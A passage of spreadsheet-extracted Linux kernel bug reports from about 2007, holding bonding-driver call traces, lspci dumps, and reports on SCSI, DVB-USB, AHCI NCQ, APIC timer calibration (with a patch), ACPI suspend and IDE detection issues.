:bonding:bond_mii_monitor+0x0/0x45b [&lt;ffffffff80287ed2&gt;] run_timer_softirq+0x142/0x1c0 [&lt;ffffffff80211f6a&gt;] __do_softirq+0x5c/0xd2 [&lt;ffffffff8025ef4c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff80268e95&gt;] do_softirq+0x2c/0x87 [&lt;ffffffff8026fdd7&gt;] smp_apic_timer_interrupt+0x57/0x6c [&lt;ffffffff8025691a&gt;] mwait_idle+0x0/0x45 [&lt;ffffffff8025e9f6&gt;] apic_timer_interrupt+0x66/0x70 &lt;EOI&gt; [&lt;ffffffff8025695c&gt;] mwait_idle+0x42/0x45 [&lt;ffffffff802484e5&gt;] cpu_idle+0x5b/0x7a [&lt;ffffffff8065b88a&gt;] start_secondary+0x4e0/0x4f6 RTNL: assertion failed at net/core/fib_rules.c (444) Call Trace: &lt;IRQ&gt; [&lt;ffffffff804a8abb&gt;] fib_rules_event+0x3b/0x120 [&lt;ffffffff8028ad24&gt;] notifier_call_chain+0x24/0x36 [&lt;ffffffff8049ccad&gt;] dev_set_mac_address+0x53/0x66 [&lt;ffffffff88019648&gt;] :bonding:alb_set_slave_mac_addr+0x4b/0x73 [&lt;ffffffff88019b1e&gt;] :bonding:alb_swap_mac_addr+0x9d/0x15c [&lt;ffffffff804a02e7&gt;] dev_mc_add+0x137/0x148 [&lt;ffffffff88014338&gt;] :bonding:bond_change_active_slave+0x1ea/0x34d [&lt;ffffffff8801481d&gt;] :bonding:bond_select_active_slave+0xbe/0xf4 [&lt;ffffffff880165e5&gt;] :bonding:bond_mii_monitor+0x401/0x45b [&lt;ffffffff880161e4&gt;] :bonding:bond_mii_monitor+0x0/0x45b [&lt;ffffffff80287ed2&gt;] run_timer_softirq+0x142/0x1c0 [&lt;ffffffff80211f6a&gt;] __do_softirq+0x5c/0xd2 [&lt;ffffffff8025ef4c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff80268e95&gt;] do_softirq+0x2c/0x87 [&lt;ffffffff8026fdd7&gt;] smp_apic_timer_interrupt+0x57/0x6c [&lt;ffffffff8025691a&gt;] mwait_idle+0x0/0x45 [&lt;ffffffff8025e9f6&gt;] apic_timer_interrupt+0x66/0x70 &lt;EOI&gt; [&lt;ffffffff8025695c&gt;] mwait_idle+0x42/0x45 [&lt;ffffffff802484e5&gt;] cpu_idle+0x5b/0x7a [&lt;ffffffff8065b88a&gt;] start_secondary+0x4e0/0x4f6 BUG: scheduling while atomic: swapper/0x10000100/0 Call Trace: &lt;IRQ&gt; [&lt;ffffffff802607d0&gt;] __sched_text_start+0x60/0xb27 [&lt;ffffffff8026f8d5&gt;] smp_local_timer_interrupt+0x34/0x5b [&lt;ffffffff8027f572&gt;] __cond_resched+0x1c/0x44 [&lt;ffffffff802613aa&gt;] cond_resched+0x2e/0x39 [&lt;ffffffff80262029&gt;] mutex_lock+0x9/0x18 [&lt;ffffffff8049ea76&gt;] netdev_run_todo+0x16/0x230 [&lt;ffffffff804bcc75&gt;] dst_rcu_free+0x0/0x3f [&lt;ffffffff804d9c29&gt;] inetdev_event+0x29/0x2d0 [&lt;ffffffff80263138&gt;] _spin_lock_bh+0x9/0x19 [&lt;ffffffff8023d84a&gt;] rt_run_flush+0x92/0xcc [&lt;ffffffff8028ad24&gt;] notifier_call_chain+0x24/0x36 [&lt;ffffffff8049ccad&gt;] dev_set_mac_address+0x53/0x66 [&lt;ffffffff88019648&gt;] :bonding:alb_set_slave_mac_addr+0x4b/0x73 [&lt;ffffffff88019b1e&gt;] :bonding:alb_swap_mac_addr+0x9d/0x15c [&lt;ffffffff804a02e7&gt;] dev_mc_add+0x137/0x148 [&lt;ffffffff88014338&gt;] :bonding:bond_change_active_slave+0x1ea/0x34d [&lt;ffffffff8801481d&gt;] :bonding:bond_select_active_slave+0xbe/0xf4 [&lt;ffffffff880165e5&gt;] :bonding:bond_mii_monitor+0x401/0x45b [&lt;ffffffff880161e4&gt;] :bonding:bond_mii_monitor+0x0/0x45b [&lt;ffffffff80287ed2&gt;] run_timer_softirq+0x142/0x1c0 [&lt;ffffffff80211f6a&gt;] __do_softirq+0x5c/0xd2 [&lt;ffffffff8025ef4c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff80268e95&gt;] do_softirq+0x2c/0x87 [&lt;ffffffff8026fdd7&gt;] smp_apic_timer_interrupt+0x57/0x6c [&lt;ffffffff8025691a&gt;] mwait_idle+0x0/0x45 [&lt;ffffffff8025e9f6&gt;] apic_timer_interrupt+0x66/0x70 &lt;EOI&gt; [&lt;ffffffff8025695c&gt;] mwait_idle+0x42/0x45 [&lt;ffffffff802484e5&gt;] cpu_idle+0x5b/0x7a [&lt;ffffffff8065b88a&gt;] start_secondary+0x4e0/0x4f6 RTNL: assertion failed at net/ipv4/devinet.c (1055) Call Trace: &lt;IRQ&gt; [&lt;ffffffff804d9c48&gt;] inetdev_event+0x48/0x2d0 [&lt;ffffffff80263138&gt;] _spin_lock_bh+0x9/0x19 [&lt;ffffffff8023d84a&gt;] rt_run_flush+0x92/0xcc [&lt;ffffffff8028ad24&gt;] notifier_call_chain+0x24/0x36 [&lt;ffffffff8049ccad&gt;] dev_set_mac_address+0x53/0x66 [&lt;ffffffff88019648&gt;] :bonding:alb_set_slave_mac_addr+0x4b/0x73 [&lt;ffffffff88019b1e&gt;] :bonding:alb_swap_mac_addr+0x9d/0x15c [&lt;ffffffff804a02e7&gt;] dev_mc_add+0x137/0x148 [&lt;ffffffff88014338&gt;] :bonding:bond_change_active_slave+0x1ea/0x34d [&lt;ffffffff8801481d&gt;] :bonding:bond_select_active_slave+0xbe/0xf4 [&lt;ffffffff880165e5&gt;] :bonding:bond_mii_monitor+0x401/0x45b [&lt;ffffffff880161e4&gt;] :bonding:bond_mii_monitor+0x0/0x45b [&lt;ffffffff80287ed2&gt;] run_timer_softirq+0x142/0x1c0 [&lt;ffffffff80211f6a&gt;] __do_softirq+0x5c/0xd2 [&lt;ffffffff8025ef4c&gt;] call_softirq+0x1c/0x28 [&lt;ffffffff80268e95&gt;] do_softirq+0x2c/0x87 [&lt;ffffffff8026fdd7&gt;] smp_apic_timer_interrupt+0x57/0x6c [&lt;ffffffff8025691a&gt;] mwait_idle+0x0/0x45 [&lt;ffffffff8025e9f6&gt;] apic_timer_interrupt+0x66/0x70 &lt;EOI&gt; [&lt;ffffffff8025695c&gt;] mwait_idle+0x42/0x45 [&lt;ffffffff802484e5&gt;] cpu_idle+0x5b/0x7a [&lt;ffffffff8065b88a&gt;] start_secondary+0x4e0/0x4f6 bonding: bond0: first active interface up! NET: Registered protocol family 10 lo: Disabled Privacy Extensions ADDRCONF(NETDEV_UP): eth1: link is not ready bond0: no IPv6 routers present eth0: no IPv6 routers present Installing knfsd (copyright (C) 1996 okir@monad.swb.de). NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory NFSD: starting 90-second grace period # lspci -vx 00:00.0 Host bridge: Intel Corporation E7220/E7221 Memory Controller Hub (rev 04) Subsystem: Dell: Unknown device 0185 Flags: bus master, fast devsel, latency 0 Capabilities: [e0] Vendor Specific Information 00: 86 80 88 25 06 01 90 20 04 00 00 06 00 00 00 00 10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20: 00 00 00 00 00 00 00 00 00 00 00 00 28 10 85 01 30: 00 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00:01.0 PCI bridge: Intel Corporation E7220/E7221 PCI Express Root Port (rev 04) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=01, subordinate=02, sec-latency=0 I/O behind bridge: 0000e000-0000efff Memory behind bridge: dfc00000-dfefffff Prefetchable memory behind bridge: d8000000-dbffffff Capabilities: [88] #0d [0000] Capabilities: [80] Power Management version 2 Capabilities: [90] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Capabilities: [a0] Express Root Port (Slot+) IRQ 0 Capabilities: [100] Virtual Channel Capabilities: [140] Unknown (5) 00: 86 80 89 25 47 00 10 00 04 00 04 06 10 00 01 00 10: 00 00 00 00 00 00 00 00 00 01 02 00 e0 e0 00 00 20: c0 df e0 df 00 d8 f0 db 00 00 00 00 00 00 00 00 30: 00 00 00 00 88 00 00 00 00 00 00 00 00 01 07 00 00:02.0 VGA compatible controller: Intel Corporation E7221 Integrated Graphics Controller (rev 04) (prog-if 00 [VGA]) Subsystem: Dell: Unknown device 0185 Flags: bus master, fast devsel, latency 0, IRQ 11 Memory at dff00000 (32-bit, non-prefetchable) [size=512K] I/O ports at 1000 [size=8] Memory at d0000000 (32-bit, prefetchable) [size=128M] Memory at dff80000 (32-bit, non-prefetchable) [size=256K] Capabilities: [d0] Power Management version 2 00: 86 80 8a 25 07 00 90 00 04 00 00 03 00 00 00 00 10: 00 00 f0 df 01 10 00 00 08 00 00 d0 00 00 f8 df 20: 00 00 00 00 00 00 00 00 00 00 00 00 28 10 85 01 30: 00 00 00 00 d0 00 00 00 00 00 00 00 0b 01 00 00 00:1c.0 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 1 (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 Capabilities: [40] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00: 86 80 60 26 07 00 10 00 03 00 04 06 10 00 81 00 10: 00 00 00 00 00 00 00 00 00 03 03 00 f0 00 00 20 20: f0 ff 00 00 f1 ff 01 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 40 00 00 00 00 00 00 00 00 01 06 00 40: 10 80 41 01 00:1c.1 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 2 (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=04, subordinate=04, sec-latency=0 Capabilities: [40] Express Root Port (Slot+) IRQ 0 Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00: 86 80 62 26 47 00 10 00 03 00 04 06 10 00 81 00 10: 00 00 00 00 00 00 00 00 00 04 04 00 f0 00 00 20 20: f0 ff 00 00 f1 ff 01 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 40 00 00 00 00 00 00 00 00 02 07 00 40: 10 80 41 01 00:1c.2 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 3 (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=05, subordinate=05, sec-latency=0 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: dfa00000-dfbfffff Capabilities: [40] Express Root Port (Slot-) IRQ 0 Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00: 86 80 64 26 47 00 10 00 03 00 04 06 10 00 81 00 10: 00 00 00 00 00 00 00 00 00 05 05 00 d0 d0 00 00 20: a0 df b0 df f1 ff 01 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 40 00 00 00 00 00 00 00 00 03 07 00 40: 10 80 41 00 00:1c.3 PCI bridge: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) PCI Express Port 4 (rev 03) (prog-if 00 [Normal decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=06, subordinate=06, sec-latency=0 Capabilities: [40] Express Root Port (Slot-) IRQ 0 Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/0 Enable- Capabilities: [90] #0d [0000] Capabilities: [a0] Power Management version 2 Capabilities: [100] Virtual Channel Capabilities: [180] Unknown (5) 00: 86 80 66 26 47 00 10 00 03 00 04 06 10 00 81 00 10: 00 00 00 00 00 00 00 00 00 06 06 00 f0 00 00 20 20: f0 ff 00 00 f1 ff 01 00 00 00 00 00 00 00 00 00 30: 00 00 00 00 40 00 00 00 00 00 00 00 00 04 07 00 40: 10 80 41 00 00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 03) (prog-if 00 [UHCI]) Subsystem: Dell: Unknown device 0185 Flags: bus master, medium devsel, latency 0, IRQ 19 I/O ports at ccc0 [size=32] 00: 86 80 58 26 05 00 80 02 03 00 03 0c </t>
  </si>
  <si>
    <t>scsi_wait_scan module should be always available</t>
  </si>
  <si>
    <t>2007-02-09 17:04 UTC</t>
  </si>
  <si>
    <t>Alexander Holler</t>
  </si>
  <si>
    <t>2007-07-06 19:33 UTC</t>
  </si>
  <si>
    <t>The scsi_wait_scan module should be always available, even if scsi was build into the kernel (not as module). E.g. I'm having two scsi-controllers in one machine, one as module and one from which the machine is booting. Currently this does not work, because I'm getting failures for devices of the driver which is build as a module. And because scsi is not build as module, the scsi_wait_scan module is not available.</t>
  </si>
  <si>
    <t>dvb_usb_dib0700 based devices get disconnected from usb bus</t>
  </si>
  <si>
    <t>dvb-usb</t>
  </si>
  <si>
    <t>2.6.19.3+ dvb-stable or 2.6.20</t>
  </si>
  <si>
    <t>2007-02-11 11:01 UTC</t>
  </si>
  <si>
    <t>Soeren Sonnenburg</t>
  </si>
  <si>
    <t>2008-12-22 09:52 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: it did never really work Distribution: debian etch Hardware Environment: intel asus a7v8x, hauppage wintv-nova-t or hama dvb-t Problem Description: After about 5hrs of correct functioning, the usb dvb-t device suddenly gets disconnected from the usb port (usb 1-3: USB disconnect, address 6 in dmesg). Then any access to the device fails with: mt2060 I2C read failed mt2060 I2C write failed Here is the relevant dmesg output. Please note that this problem happens with the hauppage aswell as the hama dvb-t dongle in different usb ports with 2 different psu's delivering much more power than necessary. So I guess this happens with *any* dib0700 based device. Also note that this is 100% reproducable in my vdr setup. Vdr itself runs nicely when only the full featured+budget dvb-c/dvb-t pci cards are used. This happens with 2.6.20 and also with 2.6.19.3 + v4l-dvb-stable as from 10.02.2007 ( hg clone http://linuxtv.org/hg/~mrechberger/v4l-dvb-stable ). This may also result in oopses as the dvb-core does not like devices to vanish... I will happily help debugging - but need guidance. usb 1-3: new high speed USB device using ehci_hcd and address 6 usb 1-3: configuration #1 chosen from 1 choice dib0700: loaded with support for 2 different device-types dvb-usb: found a 'Uniwill STK7700P based (Hama and others)' in cold state, will try to load a firmware dvb-usb: downloading firmware from file 'dvb-usb-dib0700-01.fw' dib0700: firmware started successfully. dvb-usb: found a 'Uniwill STK7700P based (Hama and others)' in warm state. dvb-usb: will pass the complete MPEG2 transport stream to the software demuxer. DVB: registering new adapter (Uniwill STK7700P based (Hama and others)). DVB: registering frontend 2 (DiBcom 7000MA/MB/PA/PB/MC)... MT2060: successfully identified (IF1 = 1220) usb 1-1: USB disconnect, address 2 dvb-usb: Uniwill STK7700P based (Hama and others) successfully initialized and connected. usbcore: registered new interface driver dvb_usb_dib0700 tda1004x: found firmware revision 2c -- ok [5 hrs later] usb 1-3: USB disconnect, address 6 mt2060 I2C write failed (len=2) mt2060 I2C write failed (len=6) mt2060 I2C read failed mt2060 I2C read failed mt2060 I2C read failed mt2060 I2C read failed mt2060 I2C read failed mt2060 I2C read failed mt2060 I2C read failed mt2060 I2C read failed mt2060 I2C read failed mt2060 I2C read failed mt2060 I2C write failed (len=2) mt2060 I2C write failed (len=6) Steps to reproduce: Try to use the dongle for more than just a few hours.</t>
  </si>
  <si>
    <t>NCQ is not being detected or enabled on ICH8R</t>
  </si>
  <si>
    <t>2.6.19-1.2895.fc6</t>
  </si>
  <si>
    <t>2007-02-11 12:24 UTC</t>
  </si>
  <si>
    <t>Michael Cronenworth</t>
  </si>
  <si>
    <t>2007-03-12 18:40 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: none Distribution: Fedora Core 6 x86_64 Hardware Environment: Asus P5B-E motherboard, Intel Core 2 Duo, 1gig DDR2, Seagate 320gig 7200.10 SATA Software Environment: FC6 packages, XFCE 4.4 Description of problem: I have an Asus P5B-E motherboard that has an i965 chipset with an ICH8R. I also have a Seagate 7200.10 320 gig S-ATA hard drive. Both devices support NCQ. NCQ is only being enabled on the hard drive and not on the host controller. I have a feeling that the "ahci" driver is seeing the AsusTek Subsystem ID (see lspci below) and not enabling full support of my ICH8R. Version-Release number of selected component (if applicable): 2.6.19-1.2895.fc6 How reproducible: Always Steps to Reproduce: 1. Boot with AHCI or RAID configuration. 2. AHCI is detected, but NCQ is not. 3. NCQ is not enabled. Actual results: NCQ disabled. Expected results: NCQ enabled. Additional info: lspci -vv 00:1f.2 RAID bus controller: Intel Corporation 82801HR/HO/HH (ICH8R/DO/DH) SATA RAID Controller (rev 02) Subsystem: ASUSTeK Computer Inc. Unknown device 81ec Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- Latency: 0 Interrupt: pin B routed to IRQ 2299 Region 0: I/O ports at ec00 [size=8] Region 1: I/O ports at e880 [size=4] Region 2: I/O ports at e800 [size=8] Region 3: I/O ports at e480 [size=4] Region 4: I/O ports at e400 [size=32] Region 5: Memory at febff800 (32-bit, non-prefetchable) [size=2K] Capabilities: [80] Message Signalled Interrupts: 64bit- Queue=0/4 Enable+ Address: fee01000 Data: 0099 Capabilities: [70] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0-,D1-,D2-,D3hot+,D3cold-) Status: D0 PME-Enable- DSel=0 DScale=0 PME- Capabilities: [a8] #12 [0010] --------------------------------------------- dmesg libata version 2.00 loaded. ahci 0000:00:1f.2: version 2.0 ACPI: PCI Interrupt 0000:00:1f.2[B] -&gt; GSI 19 (level, low) -&gt; IRQ 19 usb 3-1: device not accepting address 2, error -71 PCI: Setting latency timer of device 0000:00:1f.2 to 64 ahci 0000:00:1f.2: AHCI 0001.0100 32 slots 6 ports ? Gbps 0x3f impl RAID mode ahci 0000:00:1f.2: flags: 64bit ilck stag led pmp pio The last line should be: ahci 0000:00:1f.2: flags: 64bit ncq ilck stag led pmp pio Hard drive dmesg: ata1: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata1.00: ATA-7, max UDMA/133, 625142448 sectors: LBA48 NCQ (depth 0/32) I posted this on the redhat bugzilla, but it seems they didn't care. https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=223564</t>
  </si>
  <si>
    <t>Calibration of APIC timer fails on x86_64 SMP due to bugs in apic.c</t>
  </si>
  <si>
    <t>2007-02-12 13:40 UTC</t>
  </si>
  <si>
    <t>David P. Reed</t>
  </si>
  <si>
    <t>2007-07-23 04:34 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Distribution: Fedora Core 6 updated Hardware Environment: HP Pavilion dv9000z laptop Software Environment: Problem Description: Frequently kernel hangs very early in boot, after reporting APIC timer 0.004 MHz detected Steps to reproduce: Boot machine, with kernel parameters "debug pci=nocpi". Either it boots correctly, with a line APIC timer 12.557 MHz detected, or it fails with a line APIC timer 0.004 MHaz detected. The bug is fixed by the below patch to arch/x86_64/kernel/apic.c, which fixes several contributing factors: use of "signed int" rather than "unsigned" arithmetic caused bad compares, and initialization of APIC timer with too small a value, so it has a 50% probability of wrapping around during the time of calibration. This patch has been extensively tested on the machine that failed, and is applicable to 2.6.20 as well. I hope the patch is helpful, rather than just a bug report. ----------------- --- ../vanilla/arch/x86_64/kernel/apic.c 2006-11-29 16:57:37.000000000 -0500 +++ arch/x86_64/kernel/apic.c 2007-02-12 16:24:39.000000000 -0500 @@ -722,16 +722,19 @@ static int __init calibrate_APIC_clock(void) { - int apic, apic_start, tsc, tsc_start; + unsigned int apic, apic_start, tsc, tsc_start; + unsigned int apic_last; + unsigned int tsc_delta, apic_delta; int result; /* * Put whatever arbitrary (but long enough) timeout * value into the APIC clock, we just want to get the * counter running for calibration. */ - __setup_APIC_LVTT(1000000000); + __setup_APIC_LVTT(4000000000); apic_start = apic_read(APIC_TMCCT); + apic_last = apic_start; #ifdef CONFIG_X86_PM_TIMER if (apic_calibrate_pmtmr &amp;&amp; pmtmr_ioport) { pmtimer_wait(5000); /* 5ms wait */ @@ -745,11 +748,17 @@ do { apic = apic_read(APIC_TMCCT); rdtscl(tsc); - } while ((tsc - tsc_start) &lt; TICK_COUNT &amp;&amp; - (apic - apic_start) &lt; TICK_COUNT); - - result = (apic_start - apic) * 1000L * cpu_khz / - (tsc - tsc_start); + /* unsigned(modulo 2^32)subtraction and comparisons are + crucial here because timers often wrap around */ + tsc_delta = tsc - tsc_start; + apic_delta = apic_start - apic; + if (apic &gt; apic_last) { + printk(KERN_WARNING "wrapped apic timer=%u, last=%u, tsc=%u, tsc_delta=%u\n", apic, apic_last, tsc, tsc_delta); + } + apic_last = apic; + } while (tsc_delta &lt; (unsigned)TICK_COUNT &amp;&amp; + apic_delta &lt; (unsigned)TICK_COUNT); + result = (apic_delta * 1000L * cpu_khz) / tsc_delta; } printk("result %d\n", result);</t>
  </si>
  <si>
    <t>sleeping function called from invalid context at mm/slab.c:3034</t>
  </si>
  <si>
    <t>2007-02-12 18:57 UTC</t>
  </si>
  <si>
    <t>Javier Ruano</t>
  </si>
  <si>
    <t>2007-10-03 22:31 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: 2.6.19 Distribution: Debian Sid Linux version 2.6.20 (root@kundalini) (gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)) it happens two times at the startup. The machines works without sensible consequences. Javi. Feb 12 15:54:43 kundalini vmunix: ACPI: (supports S0 S1 S3 S4 S5) Feb 12 15:54:43 kundalini vmunix: Freeing unused kernel memory: 212k freed Feb 12 15:54:43 kundalini vmunix: Time: tsc clocksource has been installed. Feb 12 15:54:43 kundalini vmunix: Time: acpi_pm clocksource has been installed. Feb 12 15:54:43 kundalini vmunix: BUG: sleeping function called from invalid context at mm/slab.c:3034 Feb 12 15:54:43 kundalini vmunix: in_atomic():1, irqs_disabled():1 Feb 12 15:54:43 kundalini vmunix: [&lt;c0152760&gt;] kmem_cache_zalloc+0x1b/0x73 Feb 12 15:54:43 kundalini vmunix: [&lt;c02e9aee&gt;] resp_inquiry+0x2f/0x85e Feb 12 15:54:43 kundalini vmunix: [&lt;c02ea791&gt;] scsi_debug_queuecommand+0x2ec/0x1036 Feb 12 15:54:43 kundalini vmunix: [&lt;c02d2f81&gt;] scsi_done+0x0/0x16 Feb 12 15:54:43 kundalini vmunix: [&lt;c01523da&gt;] cache_alloc_refill+0x174/0x468 Feb 12 15:54:43 kundalini vmunix: [&lt;c02d77fe&gt;] scsi_init_io+0x61/0xcb Feb 12 15:54:43 kundalini vmunix: [&lt;c02d794e&gt;] scsi_prep_fn+0xe6/0x222 Feb 12 15:54:43 kundalini vmunix: [&lt;c0121c42&gt;] lock_timer_base+0x1d/0x4d Feb 12 15:54:43 kundalini vmunix: [&lt;c0121d63&gt;] __mod_timer+0x95/0xb0 Feb 12 15:54:43 kundalini vmunix: [&lt;c02d3732&gt;] scsi_dispatch_cmd+0x1be/0x24d Feb 12 15:54:43 kundalini vmunix: [&lt;c02d875e&gt;] scsi_request_fn+0x298/0x373 Feb 12 15:54:43 kundalini vmunix: [&lt;c023b6d6&gt;] blk_remove_plug+0x4e/0x5a Feb 12 15:54:43 kundalini vmunix: [&lt;c023905b&gt;] elv_insert+0x67/0x143 Feb 12 15:54:43 kundalini vmunix: [&lt;c023b775&gt;] blk_execute_rq_nowait+0x74/0xa6 Feb 12 15:54:43 kundalini vmunix: [&lt;c023b820&gt;] blk_execute_rq+0x79/0x93 Feb 12 15:54:43 kundalini vmunix: [&lt;c023ad65&gt;] blk_end_sync_rq+0x0/0x23 Feb 12 15:54:43 kundalini vmunix: [&lt;c0175950&gt;] bio_phys_segments+0xe/0x14 Feb 12 15:54:43 kundalini vmunix: [&lt;c0239f36&gt;] blk_rq_bio_prep+0x28/0x85 Feb 12 15:54:43 kundalini vmunix: [&lt;c023af59&gt;] blk_rq_map_user+0x113/0x1c1 Feb 12 15:54:43 kundalini vmunix: [&lt;c023e71f&gt;] sg_io+0x256/0x355 Feb 12 15:54:43 kundalini vmunix: [&lt;c0149241&gt;] find_mergeable_anon_vma+0x5e/0xb1 Feb 12 15:54:43 kundalini vmunix: [&lt;c023ec6a&gt;] scsi_cmd_ioctl+0x1af/0x369 Feb 12 15:54:43 kundalini vmunix: [&lt;c01158c4&gt;] do_page_fault+0x0/0x53c Feb 12 15:54:43 kundalini vmunix: [&lt;c0164d07&gt;] __d_lookup+0x120/0x13d Feb 12 15:54:43 kundalini vmunix: [&lt;c015c06d&gt;] do_lookup+0x4f/0x140 Feb 12 15:54:43 kundalini vmunix: [&lt;c02e05fc&gt;] sd_ioctl+0x94/0xb9 Feb 12 15:54:43 kundalini vmunix: [&lt;c024393d&gt;] _atomic_dec_and_lock+0x25/0x40 Feb 12 15:54:43 kundalini vmunix: [&lt;c023d126&gt;] blkdev_driver_ioctl+0x4e/0x5e Feb 12 15:54:43 kundalini vmunix: [&lt;c023d787&gt;] blkdev_ioctl+0x651/0x69e Feb 12 15:54:43 kundalini vmunix: [&lt;c0244191&gt;] kobject_get+0xf/0x13 Feb 12 15:54:43 kundalini vmunix: [&lt;c0244191&gt;] kobject_get+0xf/0x13 Feb 12 15:54:43 kundalini vmunix: [&lt;c02c4c7e&gt;] class_device_get+0xe/0x14 Feb 12 15:54:43 kundalini vmunix: [&lt;c02e03d1&gt;] sd_open+0x6d/0x117 Feb 12 15:54:43 kundalini vmunix: [&lt;c0166e08&gt;] iget5_locked+0xe4/0x193 Feb 12 15:54:43 kundalini vmunix: [&lt;c0176844&gt;] do_open+0x1d3/0x252 Feb 12 15:54:43 kundalini vmunix: [&lt;c0176669&gt;] bdget+0x100/0x108 Feb 12 15:54:43 kundalini vmunix: [&lt;c0176a6d&gt;] blkdev_open+0x0/0x4d Feb 12 15:54:43 kundalini vmunix: [&lt;c0176a92&gt;] blkdev_open+0x25/0x4d Feb 12 15:54:43 kundalini vmunix: [&lt;c0154391&gt;] __dentry_open+0x123/0x1b7 Feb 12 15:54:43 kundalini vmunix: [&lt;c015449f&gt;] nameidata_to_filp+0x24/0x33 Feb 12 15:54:43 kundalini vmunix: [&lt;c01544e5&gt;] do_filp_open+0x37/0x3e Feb 12 15:54:43 kundalini vmunix: [&lt;c0176111&gt;] block_ioctl+0x18/0x1b Feb 12 15:54:43 kundalini vmunix: [&lt;c01760f9&gt;] block_ioctl+0x0/0x1b Feb 12 15:54:43 kundalini vmunix: [&lt;c016025f&gt;] do_ioctl+0x1f/0x63 Feb 12 15:54:43 kundalini vmunix: [&lt;c01604ed&gt;] vfs_ioctl+0x24a/0x25d Feb 12 15:54:43 kundalini vmunix: [&lt;c016054c&gt;] sys_ioctl+0x4c/0x64 Feb 12 15:54:43 kundalini vmunix: [&lt;c0102dc0&gt;] syscall_call+0x7/0xb Feb 12 15:54:43 kundalini vmunix: [&lt;c03b0000&gt;] ieee80211_xmit+0x672/0xabd Feb 12 15:54:43 kundalini vmunix: =======================</t>
  </si>
  <si>
    <t>S4 restores reserved RAM - confusing BIOS AML</t>
  </si>
  <si>
    <t>2007-02-12 21:17 UTC</t>
  </si>
  <si>
    <t>2007-08-08 09:20 UTC</t>
  </si>
  <si>
    <t>Most recent kernel where this bug did *NOT* occur: Unknown. Goes as far as 2.6.17 Distribution: Mandriva cooker Hardware Environment: Toshiba Portege 4000 Software Environment: Kernel 2.6.17 .. 2.6.20 using either swsusp or user level suspend. Currently using 2.6.20 Problem Description: If AC adapter state changes during suspend to disk, it is not reflected by ACPI. As result, all user level tools continue to believe we are running on AC power resulting in hard power off instead of clean shutdown when battery is empty. Steps to reproduce: Plug in AC. Check /proc/acpi/ac_adapter/ADP1/state - it is on-line. Suspend to disk, remove power cord, resume, check /proc/acpi/ac_adapter/ADP1/state - it is still on-line. Replug, unplug power cord - state correctly changes to off-line kernel config, dmesg, lspci, dsdt (binary) and list of files under /proc/acpi attached,</t>
  </si>
  <si>
    <t>IDE controller Intel 82371AB/EB/MB PIIX4 is not recognized</t>
  </si>
  <si>
    <t>2.6.19 and 2.6.20</t>
  </si>
  <si>
    <t>2007-02-13 00:41 UTC</t>
  </si>
  <si>
    <t>Frederic MASSOT</t>
  </si>
  <si>
    <t>2009-03-19 03:30 UTC</t>
  </si>
  <si>
